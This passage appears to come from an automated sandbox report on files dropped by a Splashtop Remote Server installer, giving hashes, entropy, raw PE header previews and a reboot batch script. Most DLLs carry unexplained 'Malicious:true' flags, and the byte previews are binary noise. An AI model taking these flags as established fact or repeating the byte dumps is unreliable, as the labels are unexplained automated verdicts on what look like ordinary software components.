                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,..h..h..h..#...b..#......#...|..#...j..nN..w..nN..x..nN..|...N..k..h.....h..i...N..y...N..i...NU.i...N..i..Richh..................PE..L...J..e...........!...&.P.......p..P................................................Q....@.........................l...P............................L...(..........................................<...............................................UPX0.....p..............................UPX1.....P.......B..................@....rsrc................F..............@......................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libcelt-0.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.319762614553054
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:RdvQnJ9Cy5G4XmkRCXZ5YPPAq4SjIZUKzFrRjbuPp9Ao:Rdvby0lZ5YPPAq4SjIZUKLjbuPTj
                                                                                                                                                                                                                                                                                                                                  MD5:C90A5803A42C70747C15212288ED0A87
                                                                                                                                                                                                                                                                                                                                  SHA1:099B0B7A7C171DE82832E1C69E88A1DA32E5A532
                                                                                                                                                                                                                                                                                                                                  SHA-256:CDEB6F3D61FD5A0DCB3B2097CD1AC0C41A6D734905FC0F4F7AE89E458C4311AC
                                                                                                                                                                                                                                                                                                                                  SHA-512:DC9C28099E9D97F5FFC45DAA281224D060AA192D5D2C6F7FDF01D1A32063E3B044C2F0CC31BD78BB30F7C3668923CA37DBF4A5FBDEE348832649D4FE28617F18
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......K.>..S......#.........:...............0.....m................................}......... ......................P..o....`.......................w...(...p.......................................................................................text...............................`.P`.data........0......................@.`..bss....4....@........................0..edata..o....P.......*..............@.0@.idata.......`.......6..............@.0..reloc.......p.......:..............@.0B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libcrypto-3.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1326600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.8708551072063875
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:U1RJO1z1sYP0y5EU9dt6VpjccWjqV9JSJkj+KuZzwBMwNG7RHHsi4+uC5:UtO11sYF5LGVyfqV/TyDZzsMEQw+uC5
                                                                                                                                                                                                                                                                                                                                  MD5:72D867E8C7A84374AA72BF7FECA4334E
                                                                                                                                                                                                                                                                                                                                  SHA1:BBE4C42BEB19A1F23BFBCFC5A67164D5EA29784E
                                                                                                                                                                                                                                                                                                                                  SHA-256:17D29B81FAEA714B5A93008711D92D1329B22244A2E9F56736064CAA4FD3CD84
                                                                                                                                                                                                                                                                                                                                  SHA-512:B523DF6FFE4A51180CDF2BDA761B01A521391A6B24E081309C33C91835C19BE96015B932D527822F5837802A979A3C48F5CC111892C47C082E8BCB8F2115AC3F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...8P..8P..8P..;Q..8P..=Q..8P..<Q..8P.S=Q..8P.S<Q..8P.S;Q..8P..9P!.8P..9Q..8P..8P..8P.S<QV.8P.S8Q..8P.S.P..8P.S:Q..8PRich..8P................PE..L...%..e...........!...&.....0....(...:.. (...:..............................@<......v....@...........................:..!....:.@.....:..................(...6<.....................................t.:.............................................UPX0......(.............................UPX1......... (.....................@....rsrc....0....:..(..................@..............................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libcurl.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):374280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.91728824512086
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:WYe2D4vE6mAQmh9ophnxdm2U6jpn99hURD+2XIG/jNsfowDmbpNsD5PK07OxI4ME:1DqqAQnvnxdmFopn98hR/jGnDOKSsNTY
                                                                                                                                                                                                                                                                                                                                  MD5:278D7F9C9A7526F35E1774CCA0059C36
                                                                                                                                                                                                                                                                                                                                  SHA1:423F1EBD3CBD52046A16538D6BAA17076610CB2F
                                                                                                                                                                                                                                                                                                                                  SHA-256:12177DAE5E123526E96023A48752AE0CB47E9F6EEAFC20960F5A95CA6052D1B8
                                                                                                                                                                                                                                                                                                                                  SHA-512:75F8C4856FB04B2D5E491F32584F0AAEFA0D42356E12320CBCB67DF48E59C7F644512C2C5146FD7791C2CCB770FD709A8D8E4C72EAFB74C39E1336ACCB49A044
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......g7..#V.[#V.[#V.[h..Z.V.[h..Z.V.[h..Z7V.[6)2[%V.[6).Z3V.[6).Z;V.[6).Z.V.[h..Z'V.[...Z&V.[#V.[.W.[...Z.V.[...Z"V.[..0["V.[#VX["V.[...Z"V.[Rich#V.[................PE..L....)he...........!...%..... .......c.......p......................................+\....@..........................v.......u.......p...................(...........................................e..............................................UPX0....................................UPX1.............x..................@....rsrc.... ...p.......|..............@..............................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libmp4v2.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):623056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.452703221703766
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:vcqfl06LEuieb/drb93hVzyp5dl+lyyMKhoRZhD9ZKck9Qh/5Ffdw0CnbHu9gJJt:kqdFzbFrbUp5dl+lyyMKhoRZhD9ZKckB
                                                                                                                                                                                                                                                                                                                                  MD5:B03D660319962C265C8A5E6F89CD019D
                                                                                                                                                                                                                                                                                                                                  SHA1:289BA87563ABA33D9385C04834745AF4F5BE1882
                                                                                                                                                                                                                                                                                                                                  SHA-256:66ECEBD3D11557D42AE33B64E522F371D6D27651B8B7350BEF41F691FAB1465E
                                                                                                                                                                                                                                                                                                                                  SHA-512:F5376FE1195A14DCC4F1265F61088EF0452C72DCF17F0B7AA4ED4DB903347C60C9557E556DEAF0244DB0A5F3EA8B7065D7D66BD1638D1EC566EE26110854D5E1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......97..}V..}V..}V.......V..t...tV..t...mV..t...zV..}V...V..t....V..t...|V..c...|V..t...|V..Rich}V..........PE..L......Q...........!.....b..........+*..............................................?.....@.............................Uh......P....................j..............................................p...@............................................text...~a.......b.................. ..`.rdata...............f..............@..@.data...$.... ......................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libssl-3.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):341512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.896157399444813
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:M9tl9yREhb42jcvlftvY5RL2vu2K2KTYJ1EbH18sggSNOCZ174h5o1YL6yTlNhRY:M9tcu4Jlft1223K61EjNSNOWih5y38lu
                                                                                                                                                                                                                                                                                                                                  MD5:99A6A9656DA926AF8AA648D50B47DCFB
                                                                                                                                                                                                                                                                                                                                  SHA1:81DB96003BD8F63250ABC7E59FB35E0227D3F28A
                                                                                                                                                                                                                                                                                                                                  SHA-256:FDF1F9D0AF4FF8E5CBD4387D6849327E91F0EEDD1BEFE58D7DD8B6EC40E90A98
                                                                                                                                                                                                                                                                                                                                  SHA-512:16E850FDABF76A11ED4176E0FD57DAFB64FAF9551EA220D003C5A86AFF8C39AB40D66F7AC7FCC6EF71CFA7E1D6268BBC23E32AA5CF69DF58A5D05F666701F3C0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t.....................V................................................................................Rich...........................PE..L......e...........!...&.....P.......b.......p......................................3.....@.........................lt...>...s.......p...................(..$.......................................|d..............................................UPX0....................................UPX1................................@....rsrc....P...p...D..................@......................................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libx264-116.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1080328
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.546186990732032
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:999IeBE76bZaCUrF0XbuqIpInZVrUCzfk44dh:99S+EAZeY/Uf3
                                                                                                                                                                                                                                                                                                                                  MD5:0AB2DFD4535874F87314F2C7A95F4A34
                                                                                                                                                                                                                                                                                                                                  SHA1:467BB012D7513E9F9C2C8EB50426944920D691BD
                                                                                                                                                                                                                                                                                                                                  SHA-256:79DC42EF1CA17CC8B887FD54D7CEE9AA73583CFFA070BAC4D7DF4736CD081B0E
                                                                                                                                                                                                                                                                                                                                  SHA-512:479CCE8963B38F51B105DE46F5AAF302D534944568B58FF37F6BA082D4BE7124CA9CABD774F7BF794D559CD887CFD46D5E36F8CF87BCCB6F1A0D0EA6C1DD5E4D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....TN...........#.........P.....................q.........................p.......Q........ ......................p..............................T...(...0...9........................... ..........................P............................text...L...........................`.P`.data...............................@.`..rdata..............................@.`@.rodata..............|..............@.`@.eh_fram ...........................@.0..bss..................................`..edata......p......................@.0@.idata..............................@.0..CRT................................@.0..tls.... .... ......................@.0..reloc...9...0...:..................@.0B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppAnnotation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):6329352
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.474214666583154
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:196608:pgbAseL7BvFDZ31L+3/pcAEztjbnu7BegenubWEwBBF7QmQVmdYdlkSIWd:eIBFVImdYIc
                                                                                                                                                                                                                                                                                                                                  MD5:6C3A2BBB9B8333D5D6372BE4D1F7944B
                                                                                                                                                                                                                                                                                                                                  SHA1:134E410FF3FE258E21D4677F93D37894AAE9BD71
                                                                                                                                                                                                                                                                                                                                  SHA-256:24E1EF25FB545B2F0F965F2A731415F8064461A027BF024A0C0C86DA58ECA4CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:6F0F3999AF5328DE07636EB4938696D41ACDC7B33F1311D1870CA489C6D37EFA815621F7A24923A16D694EB6608C6D546D2B78A4A76C6566232A3D995878982F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........p.5...f...f...fhc.g...fhc.g...fhc.g...fhc.ge..fhc.g...fhc.g...f...fc..f...g...f...g...f...g6..f..g...f..g...f.tf...f...f...f..g...fRich...f........................PE..L......f...........!...&.H...lD......1.......`................................`......^a...@...........................".p... .".......#.`.:..........l`..(...`^..... .T...................@. ....... .@............`...............................text....F.......H.................. ..`.rdata...u...`...v...L..............@..@.data........"..j....".............@....rsrc...`.:...#...:..,#.............@..@.reloc......`^.......].............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppBrowser.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2005000
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.624661361303851
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:nwkv3AwJVKqoLU5WLSEA8DpT8BrpL3yZPvlOA:nwC3X2qAU5WLSfmpYBrpL3yVl/
                                                                                                                                                                                                                                                                                                                                  MD5:8304B98246741166A6EF6D7329991A3D
                                                                                                                                                                                                                                                                                                                                  SHA1:CC3E09813A11F93985C1CBDC43757E035B8D107A
                                                                                                                                                                                                                                                                                                                                  SHA-256:756B883BFA6A373DE6EC9AF2F92384468EBA12E94E30798A48D65A85978D8353
                                                                                                                                                                                                                                                                                                                                  SHA-512:8702288AB9E1372DEA83E8B020705FCE6D90C4BC8DC8D3D5424094EA7195B6B8772772A9E48D81D92F4BA0C3E3D23747E664456B2299E8CB2B230B06D4A1235E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..7..7..7.....-................6........7..M..1*.$..1*./..1*.]..Y*.<..Y*.6..Y*..6..7.}.6..Y*.6..Rich7..................PE..L......f...........!...&..................................................................@.............................<...L........p..hA...........p...(..............p...................@...........@............................................text...u........................... ..`.rdata..............................@..@.data...@........X..................@....rsrc...hA...p...B..................@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppCam.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1983496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.629362747301788
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:Oynw6ObGqDwP4zGSfKzEgro2SK/el4JzLeBIml:OewhN1z1fKzEg82SwA4JzLeBI2
                                                                                                                                                                                                                                                                                                                                  MD5:41410EEFF7D20884559976BE498402B7
                                                                                                                                                                                                                                                                                                                                  SHA1:2CB4ED924DDEBCFB3BBD09831EA7B76BDB3930C6
                                                                                                                                                                                                                                                                                                                                  SHA-256:7BA63A8B9BD4312A3CDC382E4D62AD607D932856AC1175CC83C0018C464B0C1F
                                                                                                                                                                                                                                                                                                                                  SHA-512:9E4EA26E607C2F6F77254D0CAB89CE30FB7622224DC4A079A66A42E7AE336E8AEE7FE0F1AB91E9ECE4301D1268002A858E42DECB583C6D2283BE69562F25CBB3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......p&{.4G..4G..4G...5...G...5...G...5...G...5..5G...5...G..4G..~D..2...'G..2...#G..2...VF..Z...2G..Z...5G..Z...5G..4G..5G..Z...5G..Rich4G..........................PE..L......f...........!...&............................................................"5....@..........................L.. ....M..T....0..PA...............(......`...X...p...............................@...............@............................text............................... ..`.rdata..............................@..@.data...8........V...t..............@....rsrc...PA...0...B..................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppED.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2106376
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.630783533239102
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:dNR7upmCYggootznExWoXujFqZzuu4rmqNf5tY/0:pqgzTooFnEAoXuQZCu4rmqNf5+M
                                                                                                                                                                                                                                                                                                                                  MD5:4917B37A2B9A58E53E536FA5FB234113
                                                                                                                                                                                                                                                                                                                                  SHA1:FD93BA18831B68B75DE0210EE49FC1D060CE4306
                                                                                                                                                                                                                                                                                                                                  SHA-256:91B7619E1C0536F076C267AB293BA84FE01EB38289F80D27F158AE4067BFDA3F
                                                                                                                                                                                                                                                                                                                                  SHA-512:8E397E3EDAAEF66E6238D41782BA0D30EFEE62463C5A08D72C98837C7C37575ACB3E1BF0BE6CE917435D607271C89D8E443FB695DB30CE4DDC475E6DCB40D365
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z's.;I .;I .;I `IJ!.;I `IM!.;I `IL!g;I `IO!.;I `IH!.;I .;H :8I ..M!.;I ..J!.;I ..L!9:I .@!.;I .I!.;I .. .;I .;. .;I .K!.;I Rich.;I ........PE..L......f...........!...&.....H.......c........................................ .....M. ...@......................... ... ...@...|........D...............(...P...!......p...................@...........@............................................text............................... ..`.rdata...9.......:..................@..@.data........P...\...8..............@....rsrc....D.......F..................@..@.reloc...!...P..."..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppFileHound.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2350600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.687007419216864
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:9eZbYf0fPErcZWPGA3X+WzVZsovvrtNEtj3+5u5D5K0sFTjEugVKN:9eh2uPI3Pb3XBzrs8v5N0D+5uZ5K0sxt
                                                                                                                                                                                                                                                                                                                                  MD5:53DF1EAFB05484820C02336E69C2FEE7
                                                                                                                                                                                                                                                                                                                                  SHA1:11F1C0900A90AE1160FE4E48089C91C3DF3ED82F
                                                                                                                                                                                                                                                                                                                                  SHA-256:9F99F829A4CF29858BCF4B2182CAD8682A65DA3060C4127D1D311C4628214234
                                                                                                                                                                                                                                                                                                                                  SHA-512:357286BD9FDBCFC178C59D43A102E97133C38A9045E659B30546A25F6B261E2C04C61934191741741B459B81782618FC8344A27D9DEE71951A8BBFD6A95C05D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........P...1...1...1..#C...1..MM...1..MM...1..#C...1..#C..,1..#C...1..#C...1...1..~2.......1.......1......y0...I-..1.......1.......1....Q..1...19..1.......1..Rich.1..........PE..L...(..f...........!...&.....b...............................................0$.....^.$...@........................... ....... .......!.`E............#..(....!.(6..0...p...........................p...@...............P............................text.............................. ..`.rdata...:.......<..................@..@.data......... ..^.... .............@....rsrc...`E....!..F...8!.............@..@.reloc..(6....!..8...~!.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\qrcodelib.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):108032
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.392406183079777
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:4DMkwASAlBbybU8rxkQz/g9pV9Z2dcvxp267OKiY+dp9oL:4oASAv9FYUp3OKiY+n9oL
                                                                                                                                                                                                                                                                                                                                  MD5:93601A93026211DE5CB00C3827883EEC
                                                                                                                                                                                                                                                                                                                                  SHA1:931CBC627272361425EFCAEE6362B041A3FF6E3B
                                                                                                                                                                                                                                                                                                                                  SHA-256:1959B8E79F5BC0AB7451F0F362A714572136503C864C974E1088B1951EE592A1
                                                                                                                                                                                                                                                                                                                                  SHA-512:53C5F46A1E1F188C429EE686F9CE7E0A8ED5B5BDFA51D8DD3B619B9FD61B8F6EDCC162BCBA667E6336CBED8056F0A17A614170C60059BDB2947770223D19FBC5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@.....{...{...{.......{.....'.{.......{.....s.{.#.....{...z.f.{.......{.......{.......{.Rich..{.................PE..L....9._...........!.....&...|......P-.......@..................................................................... r..s....k..(...............................l...`A...............................f..@............@.. ............................text....$.......&.................. ..`.rdata...7...@...8...*..............@..@.data....L.......0...b..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\reboot.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3221
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.297235243948338
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:3UoGnVsAdB/+8W3/VcCDO/wAKCRIpCBIweFC4+C/+CYFc:3UoGnVldBWtejp6tL
                                                                                                                                                                                                                                                                                                                                  MD5:ABE8E3568B6D951E7DD395DA46531932
                                                                                                                                                                                                                                                                                                                                  SHA1:304D81C1B48E16533EF691A9C965818136B9583C
                                                                                                                                                                                                                                                                                                                                  SHA-256:EB700422C31C15757A6C70141274A184D291AAC3BDE191A964F75A90BC084143
                                                                                                                                                                                                                                                                                                                                  SHA-512:19A79D90883103302BDDBAC8A765C6A5196FB78C223D911633285B4BA44EBFFA9C64690102498E3BEF5991DBA0F28847473A44D4F9AA7D637A4C4D3F1EFEA12E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@ECHO OFF..rem %1 - mode..set RMode=%1....IF NOT defined RMode (.. set RMode=1..)....echo RMode=%RMode%....IF %RMode% EQU 1 goto close_and_open..IF %RMode% EQU 2 goto normal_reboot..IF %RMode% EQU 3 goto reboot_to_safemode..IF %RMode% EQU 4 goto shutdown_byebye..IF %RMode% EQU 5 goto boot_to_normal..IF %RMode% EQU 6 goto boot_to_safemode..IF %RMode% EQU 7 goto normal_reboot_asrs....echo RMode=%RMode%....:close_and_open..net stop splashtopremoteservice & timeout /t 5 & net start splashtopremoteservice..GOTO end....:normal_reboot..SHUTDOWN -t 10 -r -f -c "Your Splashtop admin has issued a reboot."..GOTO end....:normal_reboot_asrs..SHUTDOWN -t 25 -r -f -c "Your Splashtop admin has issued a reboot."..GOTO end....:shutdown_byebye..shutdown -t 10 -s -f..GOTO end....:boot_to_normal..ver..ver | findstr /i "10\.0\.*\." > nul..IF %ERRORLEVEL% EQU 0 goto ver_nt6x_boot_normal..ver | findstr /i "5\.*\." > nul..IF %ERRORLEVEL% EQU 0 goto ver_nt5x_boot_normal..ver | findstr /i "6\.*\." > nul..IF %ER

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\swresample-2.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):194632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.700953544041196
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:CgElAKvMslbFN3XCm3dbSDcTn6iw5t4FEvQeXyB8LGeph+K:IFD3dmABw5SFEv/ypeqK
                                                                                                                                                                                                                                                                                                                                  MD5:4A2F597C15AD595CFD83F8A34A0AB07A
                                                                                                                                                                                                                                                                                                                                  SHA1:7F6481BE6DDD959ADDE53251FA7E9283A01F0962
                                                                                                                                                                                                                                                                                                                                  SHA-256:5E756F0F1164B7519D2269AA85E43B435B5C7B92E65ED84E6051E75502F31804
                                                                                                                                                                                                                                                                                                                                  SHA-512:0E868AD546A6081DE76B4A5CDCC7D457B2F0FB7239DC676C17C46A988A02696B12A9C3A85F627C76E6524F9A3ED25F2D9B8E8764D7E18FC708EAD4475591946F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............................9...................................................................Rich...........................PE..L...4.*b.........."!.................C....... ...............................@............@.........................p...........<.......................H.... ..P.......................................@............ ..d............................text............................... ..`.rdata..N.... ......................@..@.data...............................@....rodata.............................@..@.gfids..............................@..@_RDATA..............................@..@.reloc..P.... ......................@..B................................................................................................................................................................................................

